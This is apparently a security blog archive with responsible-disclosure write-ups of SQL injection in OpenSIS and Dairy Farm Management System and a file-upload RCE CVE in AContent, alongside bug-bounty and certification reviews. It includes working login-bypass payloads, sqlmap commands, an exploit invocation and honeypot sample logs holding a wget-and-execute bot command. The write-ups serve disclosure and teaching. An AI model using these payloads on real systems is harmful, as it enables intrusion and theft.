<p>After installing OpenSIS locally, one will be greeted with the following login screen.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/1.png" alt="" /></p>
<p>Checking for SQL injection on the login page is perhaps one of the quickest and easiest checks one can perform when analyzing a web application. It takes just a few seconds to drop a <code class="language-plaintext highlighter-rouge">'</code> in the username and password fields and pray for that <code class="language-plaintext highlighter-rouge">Error in your SQL Syntax</code> message.</p>
<p>Lo and behold… <br />
<img src="/assets/images/Exploit-Dev/OpenSIS/2.png" alt="" /></p>
<p>Not only does the web application tell us we have an error in our SQL syntax, it also provides an incredibly detailed error message that includes the whole SQL query. At this point, one could fire up SQLMap and exploit this error-based SQL injection; however, let’s first look at the error message and code further.</p>
<p>Line 117 of index.php is shown below.</p>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="nv">$login_uniform</span> <span class="o">=</span> <span class="nf">DBGet</span><span class="p">(</span><span class="nf">DBQuery</span><span class="p">(</span><span class="s1">'SELECT * FROM login_authentication WHERE UPPER(USERNAME)=UPPER(\''</span> <span class="mf">.</span> <span class="nv">$username</span> <span class="mf">.</span> <span class="s1">'\') AND UPPER(PASSWORD)=UPPER(\''</span> <span class="mf">.</span> <span class="nv">$password</span> <span class="mf">.</span> <span class="s1">'\')'</span><span class="p">));</span>
</code></pre></div></div>
<p>Building a SQL query by concatenating user input directly into a string in PHP code is never a recommended practice. In the line above, it is clear where our <code class="language-plaintext highlighter-rouge">'</code> is reflected in the SQL string.</p>
<p>Payload: <code class="language-plaintext highlighter-rouge">'</code><br />
SQL Query:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">login_authentication</span> <span class="k">WHERE</span> <span class="k">UPPER</span><span class="p">(</span><span class="n">USERNAME</span><span class="p">)</span><span class="o">=</span><span class="k">UPPER</span><span class="p">(</span><span class="k">NULL</span><span class="s1">') AND UPPER(PASSWORD)=.....
</span></code></pre></div></div>
<p>Thus, by changing our payload slightly, we may be able to use a tautology to cause this query to return <code class="language-plaintext highlighter-rouge">true</code>.</p>
<p>Payload: <code class="language-plaintext highlighter-rouge">') or 1=1;-- -</code><br />
SQL Query:</p>
<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">login_authentication</span> <span class="k">WHERE</span> <span class="k">UPPER</span><span class="p">(</span><span class="n">USERNAME</span><span class="p">)</span><span class="o">=</span><span class="k">UPPER</span><span class="p">(</span><span class="k">NULL</span><span class="s1">') or 1=1;-- -) AND UPPER(PASSWORD)=.....
</span></code></pre></div></div>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/3.png" alt="" /></p>
<p>Interestingly enough, this returned an <code class="language-plaintext highlighter-rouge">INSERT</code> SQL statement, but upon refreshing the page, one would be logged in as the administrator.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/4.png" alt="" /></p>
<p>A video POC is shown below against the OpenSIS demo site.</p>
<p><a href="https://www.youtube.com/watch?v=IDc_3kwse5Q"><img src="https://img.youtube.com/vi/IDc_3kwse5Q/0.jpg" alt="Video POC" /></a></p>
<p>(Note: after contacting OpenSIS I was given explicit permission to demonstrate this vulnerability against their demo site)</p>
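<p>The concatenated query above, shown beside a parameterized version, as an added example that is not OpenSIS code or the vendor’s patch. It runs against an in-memory SQLite table constructed to stand in for <code class="language-plaintext highlighter-rouge">login_authentication</code>, and the function names are my own.</p>

```php
<?php
// Added example (not OpenSIS code): the concatenated login query from index.php
// beside a parameterized version, run against an in-memory SQLite table that
// stands in for login_authentication. Table contents are constructed for the demo;
// the plaintext PASSWORD column only mirrors the shape of the original query.

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE login_authentication (USERNAME TEXT, PASSWORD TEXT)');
    $db->exec("INSERT INTO login_authentication VALUES ('admin', 'S3cret!')");
    return $db;
}

// Vulnerable pattern: the same string concatenation as the original. A quote in
// $username closes the literal, and the remainder of the input is parsed as SQL.
function vulnerableLogin(PDO $db, string $username, string $password): array
{
    $sql = 'SELECT * FROM login_authentication WHERE UPPER(USERNAME)=UPPER(\'' . $username
         . '\') AND UPPER(PASSWORD)=UPPER(\'' . $password . '\')';
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: the statement is compiled with placeholders first, then the
// values are bound. A quote is now just a character inside a string value and
// can never change the query's structure.
function preparedLogin(PDO $db, string $username, string $password): array
{
    $stmt = $db->prepare(
        'SELECT * FROM login_authentication WHERE UPPER(USERNAME)=UPPER(:u) AND UPPER(PASSWORD)=UPPER(:p)'
    );
    $stmt->execute([':u' => $username, ':p' => $password]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = openDemoDb();
$payload = "') or 1=1;-- -";   // the tautology payload from the write-up

// Legitimate credentials behave the same way in both versions.
printf("valid creds, prepared:  %d row(s)\n", count(preparedLogin($db, 'admin', 'S3cret!')));
// With the payload, concatenation matches every row: the authentication bypass ...
printf("payload, concatenated:  %d row(s)\n", count(vulnerableLogin($db, $payload, 'x')));
// ... while the prepared statement simply looks for a user literally named "') or 1=1;-- -".
printf("payload, prepared:      %d row(s)\n", count(preparedLogin($db, $payload, 'x')));
```

Run with the php CLI (pdo_sqlite is bundled with most builds); the same PDO pattern applies unchanged to the MySQL driver OpenSIS uses.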
<h2 id="timeline">Timeline</h2>
<p>7 January 2020 - Bug discovered and reported to OpenSIS.<br />
8 January 2020 - Response received and video POC requested.<br />
8 January 2020 - CVE reserved.<br />
13 January 2020 - Issue patched. <br />
16 January 2020 - Code pushed to SourceForge. <br />
23 August 2020 - Sufficient time has passed; CVE publicly disclosed via blog post.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/5.png" alt="" /></p>
<h2 id="conclusion">Conclusion</h2>
<p>While using this simple SQL tautology no longer bypasses authentication, the newest version of OpenSIS still throws a verbose SQL syntax error if a <code class="language-plaintext highlighter-rouge">'</code> is submitted upon login. Thus, database compromise may still be possible with the assistance of SQLMap. Preliminary Google Dork-ing reveals the existence of many schools using OpenSIS, with each being (potentially) vulnerable to unauthenticated SQL injection.</p>
<p><img src="/assets/images/Exploit-Dev/OpenSIS/6.png" alt="" /></p>
<h1>100 Days of Bug Hunting</h1>
<p>cinzinga, 2020-07-13, <a href="https://cinzinga.com/Bug-Bounty">https://cinzinga.com/Bug-Bounty</a></p>
<p>On April 1st 2019, I decided to try my hand at bug bounty hunting. What started initially as a short experiment quickly evolved into a daily obsession and a full-time hobby. In this post I will talk briefly about my experiences and impressions.</p>
<h2 id="preface">Preface</h2>
<p>From my time in the InfoSec Prep discord, as well as on Twitter, I gleaned that the community’s views on bug bounty hunting are very polarized. Half consider it to be a scam - slave labor - where big name companies outsource their security and underpay researchers. Then, there are the other half who point to influential members of the community such as Stok and NahamSec who make a living off such work. There are even researchers like Dawgyg who <a href="https://twitter.com/thedawgyg/status/1210293014586777600">publicly express their displeasure for not making $1mil in 1 year off of their bug bounty work</a>! Thus, I decided to just dive in headfirst and see where my views aligned after a set period of time.</p>
<h2 id="goals">Goals</h2>
<p>Initially I sat down to hash out my goals for this endeavor. I did not simply want to aimlessly throw payloads at websites for a month without any end goal. After a bit of thought I determined the following (in order of increasing difficulty):</p>
<ul>
<li>Find at least one valid, paid bug (not a duplicate)</li>
<li>Purchase a Burp Pro license with the profits
<ul>
<li>The Burp Pro trial is 30 days, so this seemed like a good goal to add</li>
</ul>
</li>
<li>See how high of a rank I could achieve in 1 month</li>
<li>Determine if this venture is viable long term for a beginner like myself</li>
</ul>
<p>To preface any further discussion, the fact that I am writing this after three months as opposed to just one, should give some indication that the answer to the final bullet point is “yes”.</p>
<h2 id="30-days-and-beyond">30 Days… and Beyond</h2>
<p>Starting out, I decided to hunt on BugCrowd. I cannot exactly tell you why I chose them; however, I can tell you that I am happy I did. HackerOne (H1) anecdotally seems to be the bigger name in bug bounty hunting, but I am not sure why. Personally, I fell in love with BugCrowd (BC) and found myself hunting with them daily. Perhaps the main advantage BC has over H1 is that duplicates on BC still receive points. This helps beginners like me feel more accomplished and gain rank despite not being the first to find a bug. Moreover, after some shaky and <code class="language-plaintext highlighter-rouge">Not Applicable</code> submissions on BC, I had a huge stroke of beginner’s luck. Within my first week I found a Priority 2 (P2) stored XSS on one of the largest travel sites in the world. Not long after that (and after many more duplicates) I began to receive private invites.</p>
<p>In my opinion, private invites are a core component of bug bounty hunting success. Thousands of researchers aimlessly stab at public programs, and they are extremely picked over. Thus, getting into a more selective program is almost a prerequisite to ranking up and succeeding. In another stroke of beginner’s luck, one of my first private programs ended up becoming both my most lucrative and favorite company to hunt for. I became enthralled with bug hunting. Each day I hunted from approximately 6AM to Noon.</p>
<p>Remember my goals outlined above? My first paid bug actually knocked out goals #1 and #2 simultaneously. It felt very good to have used the Burp Pro trial to earn enough to buy a full Burp Pro license for myself. Additionally, in my first 30 days I had climbed globally from ~96,000 in rank to top 2500. However, while the money and the rank were cool accomplishments, I found the knowledge gained through these endeavors to be priceless. I am extremely fortunate to have patient and understanding mentors from the InfoSec Prep discord (mainly <a href="https://twitter.com/TibSec">Tib3rius</a>) who advise me almost daily. This alone was enough to keep me coming back. Thus, I continued bug hunting for another month … and another, until finally I decided this blog post was long overdue.</p>
<p>At the end of 100 days my notable stats are as follows:</p>
<ul>
<li>Top 330 on BugCrowd (top 0.35% globally)</li>
<li>Background checked on BugCrowd (“Next Gen Pen Test” eligible)</li>
<li>Four critical submissions (SQLi)</li>
<li>Applied and accepted to Synack Red Team</li>
<li>Enough rewards to buy 100 years of Burp Pro licenses</li>
</ul>
<p>Ironically enough in this time I have never submitted a paid bug to HackerOne. This is on my to-do list and I feel as though I need to become more established there; however, with two other sites to hack for I find my time is limited.</p>
<h2 id="conclusion">Conclusion</h2>
<p>As a college student, bug bounty hunting has been an amazing opportunity. It has allowed me to target actual websites to hone my web application testing skills while simultaneously practicing writing short reports. The knowledge gained has been free and beyond that of any certification I have taken thus far. I fully intend to continue learning and submitting bugs as I can while finishing my degree. Perhaps at that point in time I will choose to pursue this as a full-time career. It’s tough to know for certain, but success is easily obtainable for those who put in the hours each day. There is no “big secret” to bug hunting that you will learn from YouTube videos or blog posts; simply dedicate the time and you will see the results. Go start hunting today!</p>
<h2 id="profiles">Profiles</h2>
<p><a href="https://bugcrowd.com/cinzinga">BugCrowd</a></p>
<p><a href="https://hackerone.com/cinzinga">HackerOne</a></p>
<p>Synack - private.</p>
<h1>CRTP Exam Review</h1>
<p>cinzinga, 2020-05-25, <a href="https://cinzinga.com/CRTP-Review">https://cinzinga.com/CRTP-Review</a></p>
<p>This last week I took and passed the Certified Red Team Professional exam. <a href="https://www.pentesteracademy.com/activedirectorylab">Certified Red Team Professional (CRTP)</a> is the introductory level Active Directory certification offered by Pentester Academy. The course is taught by Nikhil Mittal, who is the author of <a href="https://github.com/samratashok/nishang">Nishang</a> and frequently speaks at various conventions.</p>
<h2 id="labs">Labs</h2>
<p>The course is very well made and quite comprehensive. The provided materials are 30+ videos, a PDF of the slides, and a PDF with exercise solutions. The videos can easily be watched at 1.5x speed to work through the material at a rapid pace. There are 3-5 learning objectives after each course topic that allow the student to gain hands on experience in the simulated active directory lab.</p>
<p>One key thing to note is that the labs are educational labs, not challenge labs like in PWK. This means that the course walks you through the steps to get Domain Admin and Enterprise Admin; the student does not get to go out and practice on their own. Thus, once the student knows the path to DA, it is static and does not change.</p>
<p>The course covers many great topics. These topics include manual AD enumeration and the use of BloodHound, privilege escalation and persistence, and detection and defense.</p>
<p>I personally booked 30 days of CRTP lab time and I felt like this was sufficient time to work through the course materials and practice most learning objectives twice.</p>
<p><img src="/assets/images/CRTP/1.png" alt="" /></p>
<h2 id="exam">Exam</h2>
<p>In my opinion the exam truly made this course worth it. The exam contains 5 machines that the user must pivot between in order to obtain command execution on each of them. This must be accomplished in 24 hours, with another 48 hours to write a professional findings report. The exam instructions provide the student with a large hint in case you find yourself stuck: they state that no brute forcing with a dictionary is required. So, if you find yourself trying certain domain privilege escalation attacks that require cracking, know that you are in a rabbit hole.</p>
<p>Most of the pivots require additional research and careful examination of findings. The first pivot was the most difficult and took me about 6 hours to achieve. After that the second pivot was medium difficulty, taking about 2 hours. At this point, the last three pivots are trivial and took me about 2 hours total. I started the exam at 8AM and had fully compromised the exam network by 6PM.</p>
<p>I strongly recommend getting familiar with BloodHound and learning what each node/ edge represents.</p>
<p>In the end my lab report totaled about 20 pages and for my efforts I was awarded the CRTP two days after submitting it.</p>
<h2 id="conclusion">Conclusion</h2>
<p>I highly recommend CRTP for those like me who have OSCP but feel as though they lack active directory experience. I greatly enjoyed how I did not have to use a VM for the course since students RDP directly into their foothold machine. Everything in the course is done via PowerShell which provided a great learning experience. Moreover, the course can be completed relatively quickly in just 30 days. In the future I will definitely consider taking the level 2 AD course: CRTE.</p>
<p><img src="/assets/images/CRTP/2.png" alt="" /></p>
<h1>CVE-2020-10557</h1>
<p>cinzinga, 2020-03-13, <a href="https://cinzinga.com/CVE-2020-10557">https://cinzinga.com/CVE-2020-10557</a></p>
<p>This post is a brief description of the discovery and development of <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10557">CVE-2020-10557</a>.</p>
<h2 id="background">Background</h2>
<p><a href="https://github.com/atutor/AContent">AContent</a> is a free web content and authoring tool made by the same authors as <a href="https://github.com/atutor/ATutor">ATutor</a>. This application has a history of vulnerabilities on Exploit-DB, thus I expected to find more in the newest release. For the purposes of CVE testing, I aim to avoid accounts with administrator privileges to better gauge just how much damage a malicious low privileged user could accomplish. Conveniently, AContent allows for open registration of both student and teacher accounts. Since the teacher accounts have slightly more privileges, I decided to use that account.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/1.png" alt="" /><br />
<em>Figure 1: Registration Page with Check Box for Content Creator Account</em></p>
<p>After further exploration of the site I discovered an area for file uploads, always a great place to begin looking for unusual behavior or potential vulnerabilities. Shortly after trying some combinations of file extension bypass payloads, I determined that both <code class="language-plaintext highlighter-rouge">.php7</code> and <code class="language-plaintext highlighter-rouge">.phtml</code> were not rejected by the web application. Thus, one could upload a malicious web shell in order to execute commands against the web server.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/2.png" alt="" /><br />
<em>Figure 2: Successful File Upload Restriction Bypass and RCE</em></p>
<h2 id="the-exploit">The Exploit</h2>
<p>Great, so now we at least know we have a CVE for unrestricted file upload leading to RCE; however, with this CVE I wanted to try something a little different. I wanted to attempt to script a fully functional exploit to allow a user to execute commands against the server via their terminal without needing to exploit manually.</p>
<p>After struggling for way too long with Python3 and troubleshooting silly typos, I eventually got a semi-functional exploit working. I say “semi-functional” as there are two caveats. First, the user must supply a valid session cookie via command line parameters, meaning they must log in and determine this using <code class="language-plaintext highlighter-rouge">document.cookie</code>. Originally my aim was to simply pass username and password into the exploit via command line; however, I encountered some errors that I was unable to troubleshoot and thus determined using the cookie would be simpler. Second, the user must also know their author number. This number can easily be determined with Burp Suite. Alternatively, it can be brute forced as the number simply increments by <code class="language-plaintext highlighter-rouge">1</code> with each new account created, thus one could script the exploit until they see a successful completion. The completed exploit can be found <a href="https://github.com/cinzinga/CVEs/tree/master/CVE-2020-10557">here</a>.</p>
<p>Now, without further delay, I present CVE-2020-10557!</p>
<p><code class="language-plaintext highlighter-rouge">python3 cve-2020-10557.py -url http://192.168.0.21/AContent/ -cookie 58n37v64bq3teoi097koae8f01 -author 9</code></p>
<p><img src="/assets/images/Exploit-Dev/AContent/3.png" alt="" /><br />
<em>Figure 3: Successful Exploitation via Command Line</em></p>
<h2 id="impact">Impact</h2>
<p>After reaching out to the developer, I saw that this project has been unmaintained for two years. I highly recommend that the two live websites still running AContent find another web application to meet their needs.</p>
<p><img src="/assets/images/Exploit-Dev/AContent/4.png" alt="" /><br />
<em>Figure 4: Sites running AContent</em></p>
<h2 id="acknowledgements">Acknowledgements</h2>
<p>I would like to thank <a href="https://m0rph-1.github.io/">m0rph-1</a> and <a href="https://tib3rius.com/">Tib3rius</a> for putting up with all my amateur Python coding questions.</p>
<p>Author: cinzinga. Summary: This post is a brief description of the discovery and development of CVE-2020-10557.</p>
<h2 id="february-updates">February Updates</h2>
<p>2020-02-14, <a href="https://cinzinga.com/February-Updates">https://cinzinga.com/February-Updates</a></p>
<p>I figure it is about time for another blog post, as it has been just over one month since my last one. However, I am feeling a little lazy, so in this entry I will simply list accomplishments and noteworthy things that have occurred in the last 30 days or so. Honestly, each of these on its own warrants a blog post; perhaps in the future I will come back and expand on each of them more.</p>
<h2 id="publications">Publications</h2>
<ul>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6637">CVE-2020-6637</a>
<ul>
<li>This CVE’s status is still ‘reserved’ because I am allowing the vendor 90 days from discovery before publication.</li>
</ul>
</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7208">CVE-2020-7208</a>
<ul>
<li>This vulnerability was a joint discovery with <a href="https://github.com/m0rph-1">m0rph-1</a>.</li>
</ul>
</li>
<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7209">CVE-2020-7209</a>
<ul>
<li>This vulnerability was a joint discovery with <a href="https://github.com/m0rph-1">m0rph-1</a>.</li>
</ul>
</li>
</ul>
<h2 id="certifications">Certifications</h2>
<ul>
<li>
<p><a href="https://www.virtualhackinglabs.com/?courses=penetration-testing">Penetration Testing Course</a></p>
</li>
<li>
<p><a href="https://www.virtualhackinglabs.com/?courses=penetration-testing">Penetration Testing Course Advanced+</a></p>
</li>
</ul>
<p>I personally found Virtual Hacking Labs to be very fun and a good change of pace. I enjoyed the flat network topology, as I did not have to worry about dependencies or tunneling. The boxes were generally on the easier side, taking me just 14 days to root 41 machines. My only complaint was that too many privilege escalation routes depended on kernel exploits. Additionally, I found the number of Windows machines to be lacking. However, it was definitely a fun cyber range.</p>
<h2 id="projects">Projects</h2>
<ul>
<li>
<p>Cowrie Honeypot <br />
Recently I set up a honeypot using the Cowrie software. All captured malware samples can be viewed <a href="https://github.com/cinzinga/HoneypotStuff/tree/master/Samples">here</a>. This is purely for personal entertainment as I like to see how many times it gets attacked each day, what commands the bots run, and what malware samples I can catch and identify.</p>
</li>
<li>
<p>GitHub_Autopwn<br />
I can hardly call this a project of my own; it is the child of a discussion m0rph-1 and I had one evening. Since we both enjoy hunting for CVEs, we thought that a great tool to aid in identifying vulnerabilities would be a static code analyzer that can be pointed directly at a GitHub repository, saving us the time of cloning a repo and then running an analyzer by hand. He is an amazing coder and wrote it in about 24 hours. It helped us earn CVE-2020-7208 &amp; 7209. The code can be viewed <a href="https://github.com/m0rph-1/github_autopwn">here</a>.</p>
</li>
</ul>
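<p>For the kind of daily honeypot triage described in the Cowrie item above (how many hits per day, which commands the bots run, which samples were dropped), here is an added example. It is my code, not the author’s honeypot setup or anything from the linked samples repo: it reads Cowrie’s JSON-lines log format and summarises sessions per day, credentials tried, individual commands, and downloaded samples keyed by SHA-1. The log lines are constructed to match the shape of <code class="language-plaintext highlighter-rouge">cowrie.json</code> (<code class="language-plaintext highlighter-rouge">eventid</code>, <code class="language-plaintext highlighter-rouge">timestamp</code>, <code class="language-plaintext highlighter-rouge">src_ip</code>, <code class="language-plaintext highlighter-rouge">session</code> plus per-event fields); the IPs are documentation ranges and the hash is made up.</p>

```python
import json
import re
from collections import Counter

# Constructed sample lines in the shape of Cowrie's cowrie.json output: one
# JSON object per line. Not real captures; IPs are documentation ranges and
# the SHA-1 is invented.
SAMPLE_LOG = """
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.5", "src_port": 51234, "dst_port": 2222, "session": "a1b2c3d4e5f6", "protocol": "ssh", "timestamp": "2020-02-10T03:14:07.123456Z"}
{"eventid": "cowrie.login.failed", "username": "root", "password": "123456", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2020-02-10T03:14:08.000001Z"}
{"eventid": "cowrie.login.success", "username": "root", "password": "admin", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2020-02-10T03:14:09.000001Z"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.7/x86 -O x86; chmod +x x86; ./x86", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2020-02-10T03:14:10.000001Z"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.7/x86", "outfile": "var/lib/cowrie/downloads/3f786850e387550fdab836ed7e6dc881de23001b", "shasum": "3f786850e387550fdab836ed7e6dc881de23001b", "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2020-02-10T03:14:11.000001Z"}
{"eventid": "cowrie.session.closed", "duration": 4.9, "src_ip": "203.0.113.5", "session": "a1b2c3d4e5f6", "timestamp": "2020-02-10T03:14:12.000001Z"}
{"eventid": "cowrie.session.connect", "src_ip": "198.51.100.23", "src_port": 40001, "dst_port": 2222, "session": "0f0e0d0c0b0a", "protocol": "ssh", "timestamp": "2020-02-11T22:01:00.000000Z"}
{"eventid": "cowrie.login.success", "username": "admin", "password": "admin", "src_ip": "198.51.100.23", "session": "0f0e0d0c0b0a", "timestamp": "2020-02-11T22:01:01.000000Z"}
{"eventid": "cowrie.command.input", "input": "uname -a; cat /proc/cpuinfo | grep name | wc -l", "src_ip": "198.51.100.23", "session": "0f0e0d0c0b0a", "timestamp": "2020-02-11T22:01:02.000000Z"}
{"eventid": "cowrie.command.input", "input": "cd /tmp; wget http://198.51.100.7/x86 -O x86; chmod +x x86; ./x86", "src_ip": "198.51.100.23", "session": "0f0e0d0c0b0a", "timestamp": "2020-02-11T22:01:03.000000Z"}
{"eventid": "cowrie.session.file_download", "url": "http://198.51.100.7/x86", "outfile": "var/lib/cowrie/downloads/3f786850e387550fdab836ed7e6dc881de23001b", "shasum": "3f786850e387550fdab836ed7e6dc881de23001b", "src_ip": "198.51.100.23", "session": "0f0e0d0c0b0a", "timestamp": "2020-02-11T22:01:04.000000Z"}
{"eventid": "cowrie.session.closed", "duration": 4.0, "src_ip": "198.51.100.23", "session": "0f0e0d0c0b0a", "timestamp": "2020-02-11T22:01:05.000000Z"}
"""

# Bots chain commands with ; && || and |; split so each tool is counted once.
_CMD_SEP = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


def parse_events(text):
    """Parse JSON-lines text into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def split_commands(cmdline):
    """Break one shell line into its individual commands."""
    return [c for c in _CMD_SEP.split(cmdline) if c]


def summarize(events):
    sessions_per_day = Counter()
    credentials = Counter()       # (username, password) -> attempts
    commands = Counter()          # individual command -> count
    downloads = {}                # sha1 -> set of URLs it was fetched from
    for ev in events:
        day = ev["timestamp"][:10]            # ISO timestamp, keep YYYY-MM-DD
        eid = ev["eventid"]
        if eid == "cowrie.session.connect":
            sessions_per_day[day] += 1
        elif eid in ("cowrie.login.success", "cowrie.login.failed"):
            credentials[(ev["username"], ev["password"])] += 1
        elif eid == "cowrie.command.input":
            commands.update(split_commands(ev["input"]))
        elif eid == "cowrie.session.file_download":
            downloads.setdefault(ev["shasum"], set()).add(ev["url"])
    return {
        "sessions_per_day": dict(sessions_per_day),
        "credentials": credentials,
        "commands": commands,
        "downloads": {sha: sorted(urls) for sha, urls in downloads.items()},
    }


def report(text=SAMPLE_LOG, top=5):
    """Human-readable summary, returned as lines so a caller can log them."""
    s = summarize(parse_events(text))
    lines = ["sessions per day:"]
    lines += [f"  {day}: {n}" for day, n in sorted(s["sessions_per_day"].items())]
    lines.append("top credentials:")
    lines += [f"  {u}/{p}: {n}" for (u, p), n in s["credentials"].most_common(top)]
    lines.append("top commands:")
    lines += [f"  {n:3d}  {cmd}" for cmd, n in s["commands"].most_common(top)]
    lines.append("samples:")
    lines += [f"  {sha}  {', '.join(urls)}" for sha, urls in s["downloads"].items()]
    return lines


if __name__ == "__main__":
    print("\n".join(report()))
```

<p>Point <code class="language-plaintext highlighter-rouge">report()</code> at the contents of a real <code class="language-plaintext highlighter-rouge">cowrie.json</code> instead of the sample string. Keying downloads by hash rather than URL is deliberate: the same bot payload is usually re-hosted on many drop servers, and the hash is what you look up on a sample-sharing service.</p>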
<h2 id="other">Other</h2>
<ul>
<li>Promotion to Discord Moderator <br />
If you have read some of my other posts, you will notice I mention the <a href="https://discord.gg/TyZpfAs">InfoSec-Prep Discord</a> often. This server contains over 5000 cyber security students and professionals, including just shy of 600 OSCP certified members. It is a phenomenal place to learn and share ideas.</li>
</ul>
<p>Author: cinzinga.</p>
<h2 id="cve-2020-5307-5308">CVE-2020-5307 &amp; CVE-2020-5308</h2>
<p>2020-01-07, <a href="https://cinzinga.com/CVE-2020-5307-5308">https://cinzinga.com/CVE-2020-5307-5308</a></p>
<p>Dairy Farm Management System is vulnerable to SQLi and XSS. This post is a brief write-up of the discovery and exploitation of CVE-2020-5307 &amp; CVE-2020-5308. These vulnerabilities exist in version 1 of the Dairy Farm Shop Management System project, available <a href="https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/">here</a>. These discoveries came as a continuation of my previous efforts, which uncovered <a href="https://cinzinga.github.io/CVE-2019-19908/">CVE-2019-19908</a>.</p>
<h2 id="cve-2020-5307">CVE-2020-5307</h2>
<p>After installing the app locally, the user is greeted with a login screen. For now, I am going to see how far I can get without knowing the default administrator account’s credentials.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/1.png" alt="" /><br />
<em>Figure 1: DFSMS Login Page</em></p>
<p>Let’s fire up Burp Suite and capture the login request for future testing with SQLmap.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/2.png" alt="" /><br />
<em>Figure 2: Captured POST Request</em></p>
<p>Saving this request to a file, we can then target the ‘username’ and ‘password’ parameters to check for the existence of SQL injection. The command will look like:</p>
<p><code class="language-plaintext highlighter-rouge">sqlmap -r login.req --dbms=mysql -o</code></p>
<p>The <code class="language-plaintext highlighter-rouge">-r</code> option tells SQLmap to read the raw HTTP request from a file.<br />
The <code class="language-plaintext highlighter-rouge">--dbms</code> option names the back-end database management system, so SQLmap skips payloads specific to PostgreSQL, MSSQL and the rest.<br />
The <code class="language-plaintext highlighter-rouge">-o</code> option turns on all of SQLmap’s optimization switches: persistent HTTP connections (keep-alive), NULL connection, and multiple threads.</p>
<p>Almost right away, SQLmap discovers that the ‘username’ parameter is injectable. It also reports that the login page answered an injected request with a 302 redirect to a new page. A redirect, where a failed login would normally re-render the form, suggests the injected condition satisfied the authentication query, i.e. an authentication bypass. This will be explored further next.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/3.png" alt="" /><br />
<em>Figure 3: ‘username’ SQL Injection and 302-redirect</em></p>
<p>Thus, as an unauthenticated user we can dump the entire database’s contents. Really milking the Dairy Farm Management System for all it’s got.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/4.png" alt="" /><br />
<em>Figure 4: Database Contents</em></p>
<p>Shifting our focus back to that 302-redirect, we again return to the login page where we can try the most basic SQL authentication bypass payloads.</p>
<p>Username: <code class="language-plaintext highlighter-rouge">admin' or '1' = '1'; -- -</code> <br />
Password: <code class="language-plaintext highlighter-rouge">a</code></p>
<p>In a nutshell, the single quote closes the string literal the application wrapped around the username, so the <code class="language-plaintext highlighter-rouge">WHERE</code> clause becomes <code class="language-plaintext highlighter-rouge">username = 'admin' OR '1' = '1'</code>, which is true for every row. The semicolon ends the statement and the dashes comment out the rest of the original query, including the password check. The trailing <code class="language-plaintext highlighter-rouge">-</code> is there because MySQL only treats <code class="language-plaintext highlighter-rouge">--</code> as a comment when it is followed by whitespace, and the extra character keeps that space from being trimmed. Since the query now returns at least one row, the application logs us in as the first match, the admin user.</p>
<p><img src="/assets/images/Exploit-Dev/DFSMS/5.png" alt="" /><br />
<em>Figure 5: Successful Authentication Bypass</em></p>
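<p>To make the bypass concrete outside the application, here is an added example (not DFSMS’s code, and the table schema is constructed): an in-memory SQLite table stands in for the users table, and the injectable string-concatenation query sits beside the parameterised fix, both fed the payload above. One caveat: SQLite accepts <code class="language-plaintext highlighter-rouge">--</code> with no space after it, so the trailing <code class="language-plaintext highlighter-rouge">-</code> only matters on MySQL, where it preserves the whitespace the comment marker requires.</p>

```python
import sqlite3

PAYLOAD = "admin' or '1' = '1'; -- -"      # the bypass from the write-up


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the application's users table (not DFSMS's
    schema). Passwords are stored in clear text only to keep the demo short;
    a real application stores a password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "Str0ngPassw0rd!"), ("milkmaid", "moo")],
    )
    return conn


def rendered_query(username: str, password: str) -> str:
    """The SQL the database actually receives in the vulnerable version."""
    return (
        "SELECT id, username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn, username: str, password: str):
    """Injectable pattern: user input pasted straight into the SQL string.
    Returns the username of the first matching row, or None."""
    row = conn.execute(rendered_query(username, password)).fetchone()
    return row[1] if row else None


def login_safe(conn, username: str, password: str):
    """Fixed pattern: placeholders, so the payload is compared as data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[1] if row else None


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_with_payload": login_vulnerable(conn, PAYLOAD, "a"),
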